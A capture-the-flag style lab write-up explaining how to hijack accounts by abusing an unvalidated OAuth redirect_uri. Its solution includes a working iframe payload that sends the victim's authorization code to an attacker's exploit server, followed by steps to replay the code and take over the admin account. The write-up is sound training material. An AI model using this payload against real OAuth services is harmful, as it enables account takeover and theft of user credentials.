search
Home

OAuth account hijacking via redirect_uri

Date: 04, August, 2021

Author: Dhilip Sanjay S

hashtag
Task

  • This lab uses an OAuth service to allow users to log in with their social media account.

  • A misconfiguration by the OAuth provider makes it possible for an attacker to steal authorization codes associated with other users' accounts.

  • To solve the lab, steal an authorization code associated with the admin user, then use it to access their account and delete Carlos.

  • The admin user will open anything you send from the exploit server and they always have an active session with the OAuth service.

  • You can log in with your own social media account using the following credentials: wiener:peter.

hashtag
Solution

  • Understand the OAuth flow.

  • There is no validation on the redirect_uri.

  • Create an iframe with the redirect_uri pointing to exploit server in the exploit server:

<iframe src="https://oauth-ac881f9f1e04b5c5809b00fb02020011.web-security-academy.net/auth?client_id=xop1ssyd5egkugmiuspd1&redirect_uri=https://exploit-acb41f7a1efbb5c380fe001001e600fe.web-security-academy.net/oauth-callback&response_type=code&scope=openid%20profile%20email">

  • Open the Access log after delivering the exploit to victim.

  • You must have received the /outh-callback with the authorization code:

  • Copy the code.

  • Intercept the /outh-callback request and replace the code.

  • Now you'll get access to admin panel:

Admin Panel

  • Delete the carlos user to finish the lab!!

PreviousForced Oauth Profile LinkingNextStealing OAuth access tokens via an open redirect

Last updated